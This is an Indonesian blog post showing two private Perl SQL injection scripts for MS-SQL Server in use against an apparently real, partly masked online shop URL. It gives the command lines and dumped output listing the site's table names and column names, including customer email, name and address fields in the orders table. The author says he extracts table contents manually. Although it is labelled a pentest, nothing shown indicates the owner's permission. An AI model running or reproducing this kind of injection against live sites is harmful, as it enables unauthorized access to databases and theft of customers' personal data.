PenTest : SQL Injection Tools (against MS-SQL Server)

Iseng-iseng buka-buka arsip lama...
Ada dua skrip perl yg bisa digunakan untuk penetration test, tepatnya SQL Injection Tools, khusus untuk MS-SQL Server :)
Skrip-skrip ini masih bersifat PRIVATE VERSION !!!
Gak tau yach, kenapa kok aku merasa sayang menjadikannya sebagai PUBLIC VERSION...
Versi terakhir dari skrip ini, telah mengalami beberapa perbaikan :

1. Pada bagian LWP telah diperbaiki, sehingga lebih cepat responnya
2. Pada loop2nya, agar bisa digunakan untuk parsing hasilnya lebih bagus
3. Pada parsing dari respon LWP, thx to kendi aka fuzk3 yang telah membantu mengetesnya
4. Pada file logging nya, agar file log dari skrip pertama langsung bisa digunakan oleh skrip ke dua
5. Pada query SQL nya, agar bisa digunakan untuk looping dan parsing, thx to Bang TioEuy yang telah memberikan query ampuh yang merupakan inti dari 2 skrip ini

Skrip pertama bertugas untuk men-dump nama-nama tabel di database tsb, sedang skrip ke dua bertugas men-dump nama-nama kolom nya.
Lha yg bertugas untuk men-dump isi tabel nya mana ??? Dumping isi tabel bisa dilakukan secara manual saja, karena kita tidak memerlukan isi secara keseluruhan bukan ? Hanya bagian-bagian tertentu saja dari tabel yang akan kita extract secara manual, lagian bandwith masih mahal bok...

Berikut petikan skrip pertama :

b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_tbl.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_tbl.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_tbl.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
[+] tabel : 5575058|orders
[+] tabel : 21575115|ordertracking
[+] tabel : 37575172|prodcategories
...snip...

Petikan skrip ke dua :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ./sqli_loop_row.pl -t "http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=" -p 2

*********************************
SQL INJECTION AUTOMATION
trying to retrieve DB content !!!

by iko94(iko94@yahoo.com)
www.geocities.com/iko94

use : ./sqli_loop_row.pl -t "target_path" -p pilihan
contoh : ./sqli_loop_row.pl -t "http://www.o2ZZZZZ.web.id/notice_news_content.asp?id=" -p 1

ket :
-t target_path
-p pilihan


pilihan :
1 ==> satu single quote di depan injek
2 ==> dua single quote di depan injek

*********************************

http://www.imageXXXXXX.com/AB1235000equick/shopdisplayproducts.asp?id=
Tabel : orders
[+] row : 1|orderid
[+] row : 2|ocustomerid
[+] row : 3|odate
[+] row : 4|orderamount
[+] row : 5|ofirstname
[+] row : 6|olastname
[+] row : 7|oemail
[+] row : 8|oaddress
[+] row : 9|ocity
[+] row : 10|opostcode

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : ordertracking
[+] row : 1|trackid
[+] row : 2|orderid
[+] row : 3|trackcomment
[+] row : 4|trackname
[+] row : 5|trackdate
[+] row : 6|tracktime
[+] row : 7|trackview
[+] row : 8|trackemail
[+] row : 9|trackother

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
Tabel : prodcategories
[+] row : 1|id
[+] row : 2|intcategoryid
[+] row : 3|intcatalogid

Hasil tidak cocok !
gak match lagi2
++++++++++++++++++++
...snip...

Kemudian kita lihat file log nya :
b1ma@b1ma-desktop:~/dataku/sqlperl$ ls
sqliloop.log sqlilooprow.log sqlilooptbl.log sqlilooptblrow.log
b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptbl.log
5575058|orders
21575115|ordertracking
37575172|prodcategories
53575229|prodfeatures
69575286|products
85575343|projects
101575400|quantitydiscounts
117575457|registrant
...snip...

b1ma@b1ma-desktop:~/dataku/sqlperl$ cat sqlilooptblrow.log
orders | 1|orderid
orders | 2|ocustomerid
orders | 3|odate
orders | 4|orderamount
...snip...
ordertracking | 1|trackid
ordertracking | 2|orderid
ordertracking | 3|trackcomment
ordertracking | 4|trackname
...snip...
prodcategories | 1|id
prodcategories | 2|intcategoryid
prodcategories | 3|intcatalogid
...snip...
prodfeatures | 1|id
prodfeatures | 2|featurenum
prodfeatures | 3|featurecaption
prodfeatures | 4|featurename
...snip...
products | 1|catalogid
products | 2|ccode
products | 3|cname
products | 4|cdescription
products | 5|cprice
...snip...

Wah, kebanyakan snip dech...
Abiss panjang banget sich :)

Saya kira cukup sekian laporan langsung dari blog saya, tak lupa kritik, saran, cemo'ohan, wishlist, TODO bisa anda kirimkan ke iko94 [at] yahoo [dot] com


SHOUTz to :

1. my beloved wife
2. all ppl in #1stlink @ dalnet
3. TioEuy && kendi
4. Bosen's family (Alpret, boeboe)
5. all ppl in #neoteker @ dalnet
6. all of my big family
7. my old 686 machine
8. ubuntu && debian
9. linus && linux
10. larry wall && perl

Kata-kata mutiara hari ini :
The Perl motto is "There’s more than one way to do it." Divining how many more is left as an exercise to the reader.
The three principal virtues of a programmer are Laziness, Impatience, and Hubris. See the Camel Book for why.
dikutip dari manual perl.

THX GOD for everything...

[EOF]